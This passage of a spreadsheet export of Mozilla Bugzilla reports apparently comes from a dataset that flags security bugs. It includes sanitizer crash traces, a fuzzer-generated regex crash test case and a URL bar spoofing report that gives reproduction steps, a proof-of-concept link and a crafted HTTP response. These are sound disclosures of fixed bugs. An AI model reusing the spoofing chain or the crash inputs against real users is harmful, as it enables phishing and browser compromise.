    #43 0x7fafbd9b7993 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, mozilla::dom::Event*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /src/dom/events/EventDispatcher.cpp:1046:11
    #44 0x7fafc096b56a in nsDocumentViewer::LoadComplete(nsresult) /src/layout/base/nsDocumentViewer.cpp:1098:7
    #45 0x7fafc37dda5c in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /src/docshell/base/nsDocShell.cpp:6594:21
    #46 0x7fafc37dcb88 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /src/docshell/base/nsDocShell.cpp:6395:7
    #47 0x7fafc37e26f7 in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /src/docshell/base/nsDocShell.cpp
    #48 0x7fafb84503a5 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /src/uriloader/base/nsDocLoader.cpp:1313:3
    #49 0x7fafb844ef8c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /src/uriloader/base/nsDocLoader.cpp:872:14
    #50 0x7fafb844a0d7 in nsDocLoader::DocLoaderIsEmpty(bool) /src/uriloader/base/nsDocLoader.cpp:710:9
    #51 0x7fafb844d1d5 in nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /src/uriloader/base/nsDocLoader.cpp:598:5
    #52 0x7fafb844eab4 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsresult) /src/uriloader/base/nsDocLoader.cpp
    #53 0x7fafb5b162b2 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /src/netwerk/base/nsLoadGroup.cpp:568:22
    #54 0x7fafb9cfccda in DoUnblockOnload /src/dom/base/Document.cpp:7831:18
    #55 0x7fafb9cfccda in mozilla::dom::Document::UnblockOnload(bool) /src/dom/base/Document.cpp:7763
    #56 0x7fafb9cfb73f in mozilla::dom::Document::DispatchContentLoadedEvents() /src/dom/base/Document.cpp:4891:3
    #57 0x7fafb9e004eb in applyImpl&lt;mozilla::dom::Document, void (mozilla::dom::Document::*)()&gt; /src/obj-firefox/dist/include/nsThreadUtils.h:1122:12
    #58 0x7fafb9e004eb in apply&lt;mozilla::dom::Document, void (mozilla::dom::Document::*)()&gt; /src/obj-firefox/dist/include/nsThreadUtils.h:1128
    #59 0x7fafb9e004eb in mozilla::detail::RunnableMethodImpl&lt;mozilla::dom::Document*, void (mozilla::dom::Document::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /src/obj-firefox/dist/include/nsThreadUtils.h:1174
    #60 0x7fafb582d455 in mozilla::SchedulerGroup::Runnable::Run() /src/xpcom/threads/SchedulerGroup.cpp:295:32
    #61 0x7fafb586d496 in nsThread::ProcessNextEvent(bool, bool*) /src/xpcom/threads/nsThread.cpp:1180:14
    #62 0x7fafb587515d in NS_ProcessNextEvent(nsIThread*, bool) /src/xpcom/threads/nsThreadUtils.cpp:486:10
    #63 0x7fafb6bd5cbf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /src/ipc/glue/MessagePump.cpp:88:21
    #64 0x7fafb6aab79e in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #65 0x7fafb6aab79e in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #66 0x7fafb6aab79e in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #67 0x7fafc00bfcb3 in nsBaseAppShell::Run() /src/widget/nsBaseAppShell.cpp:137:27
    #68 0x7fafc46820fe in XRE_RunAppShell() /src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #69 0x7fafb6aab79e in RunInternal /src/ipc/chromium/src/base/message_loop.cc:315:10
    #70 0x7fafb6aab79e in RunHandler /src/ipc/chromium/src/base/message_loop.cc:308
    #71 0x7fafb6aab79e in MessageLoop::Run() /src/ipc/chromium/src/base/message_loop.cc:290
    #72 0x7fafc468128c in XRE_InitChildProcess(int, char**, XREChildData const*) /src/toolkit/xre/nsEmbedFunctions.cpp:757:34
    #73 0x557860950834 in content_process_main /src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #74 0x557860950834 in main /src/browser/app/nsBrowserApp.cpp:263
    #75 0x7fafd96acb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
SUMMARY: AddressSanitizer: heap-use-after-free /src/dom/media/MediaStreamGraph.cpp:1257:28 in mozilla::MediaStreamGraphImpl::UpdateGraph(long)
Shadow bytes around the buggy address:
  0x0c2880199040: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c2880199050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2880199060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2880199070: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c2880199080: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
=&gt;0x0c2880199090: fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd
  0x0c28801990a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c28801990b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa
  0x0c28801990c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c28801990d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c28801990e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1902==ABORTING</t>
        </is>
      </c>
      <c r="X4046" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4047">
      <c r="A4047" t="n">
        <v>1596550</v>
      </c>
      <c r="B4047" t="inlineStr">
        <is>
          <t>2019-11-14 12:08:27 -0800</t>
        </is>
      </c>
      <c r="C4047" t="inlineStr">
        <is>
          <t>crash-stats access for spohl</t>
        </is>
      </c>
      <c r="D4047" t="inlineStr">
        <is>
          <t>2019-11-15 08:24:24 -0800</t>
        </is>
      </c>
      <c r="E4047" t="n">
        <v>1</v>
      </c>
      <c r="F4047" t="n">
        <v>1</v>
      </c>
      <c r="G4047" t="n">
        <v>4</v>
      </c>
      <c r="H4047" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4047" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4047" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4047" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4047" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4047" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4047" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4047" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4047" t="inlineStr"/>
      <c r="Q4047" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4047" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4047" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4047" t="n">
        <v>1</v>
      </c>
      <c r="U4047" t="n">
        <v>0</v>
      </c>
      <c r="V4047" t="n">
        <v>6</v>
      </c>
      <c r="W4047" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1568457 +++
I would like to request access to the user comments in crash-stats to aid in debugging crashes on macOS. Also, having access to view exploitability results would help in triaging widget/cocoa bugs (for which I'm module owner). I log into crash-stats with spohl@mozilla.com.
ni? :gcp for manager approval.</t>
        </is>
      </c>
      <c r="X4047" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4048">
      <c r="A4048" t="n">
        <v>682252</v>
      </c>
      <c r="B4048" t="inlineStr">
        <is>
          <t>2011-08-26 04:12:27 -0700</t>
        </is>
      </c>
      <c r="C4048" t="inlineStr">
        <is>
          <t>YARR Assertion failure: static_cast&lt;unsigned&gt;(-position) &lt;= pos (or optimized crash [@ JSC::Yarr::Interpreter::checkCharacterClass])</t>
        </is>
      </c>
      <c r="D4048" t="inlineStr">
        <is>
          <t>2013-01-19 13:49:51 -0800</t>
        </is>
      </c>
      <c r="E4048" t="n">
        <v>1</v>
      </c>
      <c r="F4048" t="n">
        <v>1</v>
      </c>
      <c r="G4048" t="n">
        <v>3</v>
      </c>
      <c r="H4048" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4048" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4048" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4048" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4048" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4048" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4048" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4048" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4048" t="inlineStr">
        <is>
          <t>[sg:high][js-triage-needed][qa-] wanted-standalone-js</t>
        </is>
      </c>
      <c r="Q4048" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4048" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4048" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4048" t="n">
        <v>1</v>
      </c>
      <c r="U4048" t="n">
        <v>0</v>
      </c>
      <c r="V4048" t="n">
        <v>10</v>
      </c>
      <c r="W4048" t="inlineStr">
        <is>
          <t>The following test crashes (YARR assert) on mozilla-central (tested revision 7054f0e3e70e) when run with options "-j -m". Test was produced by LangFuzz with the regular expression extension:
re = new RegExp("([^b]*)+((..)|(\\3))+?Sc*a!(a|ab)(c|bcd)(&lt;*)", "i");
var str = "aNULLxabcd";
str.replace(re, function(s) { return s; });
Optimized shell furthermore crashes dangerously:
==12570== Invalid read of size 2
==12570==    at 0x51F060: JSC::Yarr::Interpreter::checkCharacterClass(JSC::Yarr::CharacterClass*, bool, int) (YarrInterpreter.cpp:212)
==12570==    by 0x51F420: JSC::Yarr::Interpreter::matchCharacterClass(JSC::Yarr::ByteTerm&amp;, JSC::Yarr::Interpreter::DisjunctionContext*) (YarrInterpreter.cpp:454)
==12570==    by 0x51FD87: JSC::Yarr::Interpreter::matchDisjunction(JSC::Yarr::ByteDisjunction*, JSC::Yarr::Interpreter::DisjunctionContext*, bool, bool) (YarrInterpreter.cpp:1194)
==12570==    by 0x51F81F: JSC::Yarr::Interpreter::matchNonZeroDisjunction(JSC::Yarr::ByteDisjunction*, JSC::Yarr::Interpreter::DisjunctionContext*, bool) (YarrInterpreter.cpp:1376)
==12570==    by 0x5201AF: JSC::Yarr::Interpreter::matchParentheses(JSC::Yarr::ByteTerm&amp;, JSC::Yarr::Interpreter::DisjunctionContext*) (YarrInterpreter.cpp:881)
==12570==    by 0x51FDA7: JSC::Yarr::Interpreter::matchDisjunction(JSC::Yarr::ByteDisjunction*, JSC::Yarr::Interpreter::DisjunctionContext*, bool, bool) (YarrInterpreter.cpp:1202)
==12570==    by 0x5202D8: JSC::Yarr::Interpreter::interpret() (YarrInterpreter.cpp:1401)
==12570==    by 0x51EB52: JSC::Yarr::interpret(JSC::Yarr::BytecodePattern*, unsigned short const*, unsigned int, unsigned int, int*) (YarrInterpreter.cpp:1901)
==12570==    by 0x414BD9: js::RegExp::executeInternal(JSContext*, js::RegExpStatics*, JSString*, unsigned long*, bool, js::Value*) (jsregexpinlines.h:371)
==12570==    by 0x4982AE: DoMatch(JSContext*, js::RegExpStatics*, JSString*, RegExpPair const&amp;, bool (*)(JSContext*, js::RegExpStatics*, unsigned long, void*), void*, MatchControlFlags, js::Value*) (jsregexpinlines.h:167)
==12570==    by 0x49A0AF: js::str_replace(JSContext*, unsigned int, js::Value*) (jsstr.cpp:2049)
==12570==    by 0x51019C: CallCompiler::generateNativeStub() (jscntxtinlines.h:281)
==12570==  Address 0x2041039c4 is not stack'd, malloc'd or (recently) free'd
==12570== 
==12570== 
==12570== Process terminating with default action of signal 11 (SIGSEGV)
==12570==  Access not within mapped region at address 0x2041039C4
Bisect shows the same revision as bug 679986 (the YARR import):
The first bad revision is:
changeset:   70607:cc36a234d0d6
user:        David Mandelin &lt;dmandelin@mozilla.com&gt;
date:        Thu May 12 18:39:47 2011 -0700
summary:     Bug 625600: Update Yarr import to WebKit rev 86639, r=cdleary,dvander
It seems unlikely to me though that it's the same bug (more likely the import of that WebKit revision pulled in a few bugs). Cloned this from bug 679986 including all tracking flags.</t>
        </is>
      </c>
      <c r="X4048" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4049">
      <c r="A4049" t="n">
        <v>566110</v>
      </c>
      <c r="B4049" t="inlineStr">
        <is>
          <t>2010-05-15 00:22:38 -0700</t>
        </is>
      </c>
      <c r="C4049" t="inlineStr">
        <is>
          <t>[k] Form validation and error messages for forums forms</t>
        </is>
      </c>
      <c r="D4049" t="inlineStr">
        <is>
          <t>2010-05-26 20:45:48 -0700</t>
        </is>
      </c>
      <c r="E4049" t="n">
        <v>1</v>
      </c>
      <c r="F4049" t="n">
        <v>1</v>
      </c>
      <c r="G4049" t="n">
        <v>5</v>
      </c>
      <c r="H4049" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4049" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4049" t="inlineStr">
        <is>
          <t>Forum</t>
        </is>
      </c>
      <c r="K4049" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4049" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4049" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4049" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4049" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4049" t="inlineStr"/>
      <c r="Q4049" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4049" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4049" t="inlineStr">
        <is>
          <t>2.1</t>
        </is>
      </c>
      <c r="T4049" t="n">
        <v>1</v>
      </c>
      <c r="U4049" t="n">
        <v>0</v>
      </c>
      <c r="V4049" t="n">
        <v>9</v>
      </c>
      <c r="W4049" t="inlineStr">
        <is>
          <t>Like a good (read: masochistic) tester, I pasted the US Constitution (HTML, though, [1]) into the "Title" field on http://support-stage-new.mozilla.com/en-US/forums/test-forum/new, and got:
"YOU SCREWED UP" (thanks! :)
[1] http://www.earlyamerica.com/earlyamerica/freedom/constitution/text.html</t>
        </is>
      </c>
      <c r="X4049" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4050">
      <c r="A4050" t="n">
        <v>1536227</v>
      </c>
      <c r="B4050" t="inlineStr">
        <is>
          <t>2019-03-18 13:41:14 -0700</t>
        </is>
      </c>
      <c r="C4050" t="inlineStr">
        <is>
          <t>Crash in [@ nsTArray_Impl&lt;T&gt;::RemoveElement&lt;T&gt;(class `anonymous namespace'::ParentImpl*&amp; const, const class nsDefaultComparator&lt;T&gt;&amp; const) | mozilla::a11y::DocAccessibleParent::RecvHideEvent]</t>
        </is>
      </c>
      <c r="D4050" t="inlineStr">
        <is>
          <t>2020-06-05 00:22:33 -0700</t>
        </is>
      </c>
      <c r="E4050" t="n">
        <v>1</v>
      </c>
      <c r="F4050" t="n">
        <v>1</v>
      </c>
      <c r="G4050" t="n">
        <v>3</v>
      </c>
      <c r="H4050" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4050" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4050" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K4050" t="inlineStr">
        <is>
          <t>63 Branch</t>
        </is>
      </c>
      <c r="L4050" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4050" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N4050" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4050" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4050" t="inlineStr">
        <is>
          <t>[adv-main69+][adv-esr68.2-rollup]</t>
        </is>
      </c>
      <c r="Q4050" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4050" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4050" t="inlineStr">
        <is>
          <t>mozilla70</t>
        </is>
      </c>
      <c r="T4050" t="n">
        <v>1</v>
      </c>
      <c r="U4050" t="n">
        <v>0</v>
      </c>
      <c r="V4050" t="n">
        <v>43</v>
      </c>
      <c r="W4050" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-ee4cf772-6446-4451-86a1-253e90190315.
```
Top 7 frames of crashing thread:
0 xul.dll static bool nsTArray_Impl&lt; xpcom/ds/nsTArray.h:1778
1 xul.dll mozilla::a11y::DocAccessibleParent::RecvHideEvent accessible/ipc/DocAccessibleParent.cpp:184
2 xul.dll mozilla::a11y::PDocAccessibleParent::OnMessageReceived ipc/ipdl/PDocAccessibleParent.cpp:287
3 xul.dll void mozilla::ipc::MessageChannel::DispatchMessage ipc/glue/MessageChannel.cpp:2078
4 xul.dll nsresult mozilla::ipc::MessageChannel::MessageTask::Run ipc/glue/MessageChannel.cpp:1968
5 xul.dll nsThread::ProcessNextEvent xpcom/threads/nsThread.cpp:1179
6 xul.dll XPTC__InvokebyIndex 
```
these crashes are starting to show up since firefox 63 on 64bit versions of windows - in rather low volume though. most of the affected builds and comments are in chinese.
a portion of crashes are looking like wild-pointer issues.</t>
        </is>
      </c>
      <c r="X4050" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4051">
      <c r="A4051" t="n">
        <v>1875248</v>
      </c>
      <c r="B4051" t="inlineStr">
        <is>
          <t>2024-01-18 02:58:51 -0800</t>
        </is>
      </c>
      <c r="C4051" t="inlineStr">
        <is>
          <t>Url Bar Spoofing (to blank URL bar) when navigating to specific application/octet-stream endpoint</t>
        </is>
      </c>
      <c r="D4051" t="inlineStr">
        <is>
          <t>2024-09-18 19:40:41 -0700</t>
        </is>
      </c>
      <c r="E4051" t="n">
        <v>1</v>
      </c>
      <c r="F4051" t="n">
        <v>1</v>
      </c>
      <c r="G4051" t="n">
        <v>3</v>
      </c>
      <c r="H4051" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4051" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4051" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K4051" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4051" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M4051" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4051" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4051" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4051" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [adv-main126+]</t>
        </is>
      </c>
      <c r="Q4051" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4051" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4051" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T4051" t="n">
        <v>1</v>
      </c>
      <c r="U4051" t="n">
        <v>0</v>
      </c>
      <c r="V4051" t="n">
        <v>16</v>
      </c>
      <c r="W4051" t="inlineStr">
        <is>
          <t>Created attachment 9373467
first_site_source.html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
The problem as i understood, originates from behavioral miss-match in response parsing and html renderer components. The Top level(Get) navigation to a page which responses with 404 status code and 'application/octet-stream' Content-Type leads to this bug in concrete.
This was actually discovered by accident, while doing an Authorized Pentesting engagement of a client Web app.
Complexity: One-click navigation to attacker controlled site
Steps to Reproduce:
So the steps involve an attacker hosting two ends, one for initial navigation and one for bug triggering.
First site just redirects to another(second) after some time of initial navigation, the Second one gives a crafted response triggering the spoofing while the content is freezed.
In real life case, a target just follows the attacker site link and then the url bar turns spoofed(cleaned url bar with freezed attacker site content - which makes illusion of seeing it as default Mozilla page in target side).
For Direct PoC demonstration, i hosted public ends which do the exploitation chain fully.
Just navigating to following link: `https://eoxvf4u5flv9ndl.m.pipedream.net` shows the bug. Wait for few seconds to see the url bar spoofing happen.
Giving the first site's html source code for helping better investigation in the attachment.
The response of second site which triggers the bug:
```
HTTP/2 404 Not Found
Date: Thu, 18 Jan 2024 10:58:08 GMT
Content-Type: application/octet-stream; charset=utf-8
Content-Length: 14
X-Powered-By: Express
Access-Control-Allow-Origin: *
Page not found
```</t>
        </is>
      </c>
      <c r="X4051" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4052">
      <c r="A4052" t="n">
        <v>345305</v>
      </c>
      <c r="B4052" t="inlineStr">
        <is>
          <t>2006-07-20 03:07:37 -0700</t>
        </is>
      </c>
      <c r="C4052" t="inlineStr">
        <is>
          <t>Arbitrary code execution with Venkman JavaScript Debugger</t>
        </is>
      </c>
      <c r="D4052" t="inlineStr">
        <is>
          <t>2018-10-16 12:20:08 -0700</t>
        </is>
      </c>
      <c r="E4052" t="n">
        <v>1</v>
      </c>
      <c r="F4052" t="n">
        <v>1</v>
      </c>
      <c r="G4052" t="n">
        <v>6</v>
      </c>
      <c r="H4052" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4052" t="inlineStr">
        <is>
          <t>Other Applications Graveyard</t>
        </is>
      </c>
      <c r="J4052" t="inlineStr">
        <is>
          <t>Venkman JS Debugger</t>
        </is>
      </c>
      <c r="K4052" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4052" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4052" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4052" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4052" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4052" t="inlineStr">
        <is>
          <t>[sg:moderate] critical on debugged pages [vnk-0.9.88]</t>
        </is>
      </c>
      <c r="Q4052" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4052" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4052" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4052" t="n">
        <v>1</v>
      </c>
      <c r="U4052" t="n">
        <v>0</v>
      </c>
      <c r="V4052" t="n">
        <v>36</v>
      </c>
      <c r="W4052" t="inlineStr">
        <is>
          <t>See Bug 344494 and Bug 344751.
Venkman is vulnerable to attacks using the Array.prototype methods, too.
Steps to Reproduce:
1. Open JavaScript Debugger (Venkman).
2. Open testcase.
3. Set a breakpoint at function xxx.
4. Click a button to call xxx().
5. Step over until after |var yyy = {};|.
6. Open the tree item for |yyy| in the Local Variables view.
An alert dialog that shows Components.stack will appear.</t>
        </is>
      </c>
      <c r="X4052" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4053">
      <c r="A4053" t="n">
        <v>1293709</v>
      </c>
      <c r="B4053" t="inlineStr">
        <is>
          <t>2016-08-09 10:32:39 -0700</t>
        </is>
      </c>
      <c r="C4053" t="inlineStr">
        <is>
          <t>nsWindow::LayerViewSupport's weak reference used on multiple threads</t>
        </is>
      </c>
      <c r="D4053" t="inlineStr">
        <is>
          <t>2021-11-04 12:13:25 -0700</t>
        </is>
      </c>
      <c r="E4053" t="n">
        <v>1</v>
      </c>
      <c r="F4053" t="n">
        <v>1</v>
      </c>
      <c r="G4053" t="n">
        <v>6</v>
      </c>
      <c r="H4053" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4053" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J4053" t="inlineStr">
        <is>
          <t>Widget: Android</t>
        </is>
      </c>
      <c r="K4053" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4053" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4053" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N4053" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4053" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4053" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main51+]</t>
        </is>
      </c>
      <c r="Q4053" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4053" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4053" t="inlineStr">
        <is>
          <t>mozilla51</t>
        </is>
      </c>
      <c r="T4053" t="n">
        <v>1</v>
      </c>
      <c r="U4053" t="n">
        <v>0</v>
      </c>
      <c r="V4053" t="n">
        <v>24</v>
      </c>
      <c r="W4053" t="inlineStr">
        <is>
          <t>Based on bug 956338, see https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=cfc312760e8c4c6103e05b80db1b192d64fe337b for android, log: https://treeherder.mozilla.org/logviewer.html#?job_id=25388610&amp;repo=try#L1704
Weak references are not thread safe.
 09:35:44     INFO -   0  libxul.so!mozilla::detail::WeakReference&lt;nsWindow::GeckoViewSupport&gt;::get [WeakPtr.h:cfc312760e8c : 137 + 0x0]
 09:35:44     INFO -       r0 = 0x5d7dd7d7    r1 = 0x96b33039    r2 = 0x96b33039    r3 = 0x5df31f08
 09:35:44     INFO -       r4 = 0x00000000    r5 = 0x61e24b60    r6 = 0x2a2964b0    r7 = 0x62bff498
 09:35:44     INFO -       r8 = 0x62bff4a8    r9 = 0x5347cedc   r10 = 0x2a295de0   r12 = 0x00000003
 09:35:44     INFO -       fp = 0x62bff4bc    sp = 0x62bff430    lr = 0x5cb4c86b    pc = 0x5cb4c86a
 09:35:44     INFO -      Found by: given as instruction pointer in context
 09:35:44     INFO -   1  libxul.so!mozilla::jni::detail::NativePtr&lt;nsWindow::LayerViewSupport, true&gt;::Get&lt;mozilla::jni::LocalRef&lt;mozilla::java::LayerView::Compositor&gt; &gt; [WeakPtr.h:cfc312760e8c : 246 + 0x5]
 09:35:44     INFO -       r4 = 0x4c7a3f78    r5 = 0x2a2964b0    r6 = 0x2a2964b0    r7 = 0x62bff498
 09:35:44     INFO -       r8 = 0x62bff4a8    r9 = 0x5347cedc   r10 = 0x2a295de0    fp = 0x62bff4bc
 09:35:44     INFO -       sp = 0x62bff448    pc = 0x5cb4f7c3
 09:35:44     INFO -      Found by: call frame info
 09:35:44     INFO -   2  libxul.so!mozilla::jni::detail::ProxyNativeCall&lt;nsWindow::LayerViewSupport, mozilla::java::LayerView::Compositor, false, false&gt;::operator() [Natives.h:cfc312760e8c : 345 + 0x5]
 09:35:44     INFO -       r3 = 0x0000001a    r4 = 0x4c7a3f78    r5 = 0x62bff490    r6 = 0x2a2964b0
 09:35:44     INFO -       r7 = 0x62bff498    r8 = 0x62bff4a8    r9 = 0x5347cedc   r10 = 0x2a295de0
 09:35:44     INFO -       fp = 0x62bff4bc    sp = 0x62bff458    pc = 0x5cb4f805
 09:35:44     INFO -      Found by: call frame info
 09:35:44     INFO -   3  libxul.so!nsWindow::LayerViewSupport::OnNativeCall&lt;mozilla::jni::detail::ProxyNativeCall&lt;nsWindow::LayerViewSupport, mozilla::java::LayerView::Compositor, false, false&gt; &gt; [nsWindow.cpp:cfc312760e8c : 958 + 0x5]
 09:35:44     INFO -       r4 = 0x4c7a3f78    r5 = 0x62bff490    r6 = 0x00000000    r7 = 0x5347cee4
 09:35:44     INFO -       r8 = 0x62bff4a8    r9 = 0x5347cedc   r10 = 0x2a295de0    fp = 0x62bff4bc
 09:35:44     INFO -       sp = 0x62bff478    pc = 0x5cb4f88f
 09:35:44     INFO -      Found by: call frame info
 09:35:44     INFO -   4  libxul.so!mozilla::jni::detail::NativeStubImpl&lt;mozilla::java::LayerView::Compositor::SyncInvalidateAndScheduleComposite_t, nsWindow::LayerViewSupport, mozilla::jni::Args&lt;&gt;, false, true&gt;::Wrap&lt;&amp;nsWindow::LayerViewSupport::SyncInvalidateAndScheduleComposite&gt; [Natives.h:cfc312760e8c : 412 + 0x5]
 09:35:44     INFO -       r4 = 0x4c7a3f78    r5 = 0x2a295dd0    r6 = 0x00000000    r7 = 0x5347cee4
 09:35:44     INFO -       r8 = 0x62bff4a8    r9 = 0x5347cedc   r10 = 0x2a295de0    fp = 0x62bff4bc
 09:35:44     INFO -       sp = 0x62bff490    pc = 0x5cb4f979
 09:35:44     INFO -      Found by: call frame info
stack not copied completely, see the log.</t>
        </is>
      </c>
      <c r="X4053" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4054">
      <c r="A4054" t="n">
        <v>655150</v>
      </c>
      <c r="B4054" t="inlineStr">
        <is>
